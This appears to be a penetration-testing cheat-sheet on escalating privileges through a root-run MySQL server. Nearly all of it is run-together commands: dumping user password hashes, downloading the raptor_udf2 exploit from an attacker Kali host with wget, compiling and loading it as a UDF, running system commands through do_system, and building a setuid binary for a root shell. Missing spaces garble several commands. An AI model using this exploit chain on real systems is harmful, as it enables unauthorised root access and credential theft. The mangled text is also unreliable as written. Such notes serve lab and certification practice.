# Check the version of MySQLLinEnum.sh# Check if MySQL is run by rootpsaugxw|greproot|grepmysql# Get current user (an all users) privileges and hashesmysql> usemysql;mysql> selectuser();mysql> selectuser,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_privfromuser;# google vulnerabilityMySQL,5.0.xxprivilegeescalation
Escalation
# Get a source code, and then compile it on the target machinewgethttp://<KaliIP>/1518.cmv1518.craptor_udf2.cgcc-g-craptor_udf2.cgcc-g-shared-Wl,-soname,raptor_udf2.so-oraptor_udf2.soraptor_udf2.o-lcmysql-uroot-pEnterpassword:mysql> usemysql;mysql> createtablefoo(lineblob);mysql> insertintofoovalues(load_file('/home/j0hn/raptor_udf2.so'));mysql> select*fromfoointodumpfile'/usr/lib/raptor_udf2.so';mysql> createfunctiondo_systemreturnsintegersoname'raptor_udf2.so';mysql> select*frommysql.func;mysql> selectdo_system('id > /tmp/out; chown j0hn.j0hn /tmp/out');mysql> \! shcat/tmp/outwgethttps://github.com/wg135/script/blob/master/suid.c/tmpexitmysql> selectdo_system('gcc -o /tmp/suid /tmp/suid.c');mysql> selectdo_system('chmod u+s /tmp/suid');mysql> \! shbash$./suid